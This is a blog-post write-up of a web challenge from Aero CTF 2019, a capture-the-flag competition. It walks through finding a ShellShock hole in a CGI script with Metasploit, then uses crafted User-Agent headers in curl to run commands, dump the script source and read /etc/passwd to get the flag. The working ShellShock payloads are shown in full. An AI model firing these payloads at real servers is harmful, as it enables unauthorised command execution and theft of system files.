---
layout: post
title: "Aero CTF 2019 - Write-ups"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - ctf
  - web
  - cgi
date: 2019/03/10
thumbnail: /images/ctf.png
authorId: noraj
toc: true
---

## Information

### CTF

- **Name** : Aero CTF 2019
- **Website** : [aeroctf.com](http://aeroctf.com/)
- **Type** : Online
- **Format** : Jeopardy
- **CTF Time** : [link](https://ctftime.org/event/772)

## 100 - board tracking system - Web

> We develop advanced board tracking system, is it vulnerable?

Let's see the page: `curl 'http://81.23.11.159:8080/'`

```html
<html>
        <head>
                <style>
                        body, pre {
                                color: #7b7b7b;
                                font: 300 16px/25px "Roboto",Helvetica,Arial,sans-serif;
                        }
                </style>
        <meta name="generator" content="vi2html">
        </head>
        <body>
        </br>
Welcome to control plane application of Aeroctf system.</br>
</br>
</br>
On a dashboard you can see loading our system</br>
        </br>
Stats:
        </br>
        <iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe>
        </body>
</html>
```

It seems it is using a CGI. And it seems it is an Apache httpd webserver:

```
curl -v 'http://81.23.11.159:8080/cgi-bin/stats'
*   Trying 81.23.11.159...
* TCP_NODELAY set
* Connected to 81.23.11.159 (81.23.11.159) port 8080 (#0)
> GET /cgi-bin/stats HTTP/1.1
> Host: 81.23.11.159:8080
> User-Agent: curl/7.64.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Fri, 08 Mar 2019 19:32:50 GMT
< Server: Apache/2.2.22 (Debian)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
< 
Fri Mar 8 19:32:50 UTC 2019
19:32:50 up 93 days, 5:01, 0 users, load average: 0.05, 0.02, 0.00
* Connection #0 to host 81.23.11.159 left intact
```

So let's fire metasploit because we may have a ShellShock vulnerability here.

First we will use the auxiliary scanner to check that:

```
msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options 

Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CMD        /usr/bin/id      yes       Command to run (absolute paths required)
   CVE        CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER     User-Agent       yes       HTTP header to use
   METHOD     GET              yes       HTTP method to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       Path to CGI script
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 81.23.11.159
RHOSTS => 81.23.11.159
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RPORT 8080
RPORT => 8080
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/stats
TARGETURI => /cgi-bin/stats
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run

[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Ooops, it is vulnerable. Let's use an exploit now:

```
curl -v 'http://81.23.11.159:8080/cgi-bin/stats' -H 'User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"' 
*   Trying 81.23.11.159...
* TCP_NODELAY set
* Connected to 81.23.11.159 (81.23.11.159) port 8080 (#0)
> GET /cgi-bin/stats HTTP/1.1
> Host: 81.23.11.159:8080
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"
> 
< HTTP/1.1 200 OK
< Date: Fri, 08 Mar 2019 20:16:48 GMT
< Server: Apache/2.2.22 (Debian)
< Transfer-Encoding: chunked
< 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Content-type: text/html
```

For example we can now take a look at the source CGI script:

```
curl 'http://81.23.11.159:8080/cgi-bin/stats' -H 'User-Agent: () { :;};echo -e "\r\n$(/bin/cat stats)"' 
#!/bin/bash

echo "Content-type: text/html";
echo ""

/bin/cat << EOM
<pre>
EOM

echo `date`
echo `uptime`
#echo "<br />"
#nets=`/bin/netstat -an 2>/dev/null`
#echo "$nets"
#echo "<br />"
#iost=`/usr/bin/iostat 2>/dev/null`
#echo "$iost"

/bin/cat << EOM
</pre>
EOM
test
Content-type: text/html

Fri Mar 8 20:27:27 UTC 2019
```

I look around for some minutes where the flag could be when I decided to take a look at `/etc/passwd`, maybe a weird user will point me to a vulnerable service or something.

```
curl -v 'http://81.23.11.159:8080/cgi-bin/stats' -H 'User-Agent: () { :;};echo -e "\r\n$(/bin/cat /etc/passwd)"'
*   Trying 81.23.11.159...
* TCP_NODELAY set
* Connected to 81.23.11.159 (81.23.11.159) port 8080 (#0)
> GET /cgi-bin/stats HTTP/1.1
> Host: 81.23.11.159:8080
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/bin/cat /etc/passwd)"
> 
< HTTP/1.1 200 OK
< Date: Fri, 08 Mar 2019 20:30:23 GMT
< Server: Apache/2.2.22 (Debian)
< Transfer-Encoding: chunked
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Aero{c58b51bee681ba3aa3971cef7aa26696}
Content-type: text/html

Fri Mar 8 20:30:23 UTC 2019
20:30:23 up 93 days, 5:59, 0 users, load average: 0.00, 0.00, 0.00
* Connection #0 to host 81.23.11.159 left intact
```

No, the flag was stupidly here.
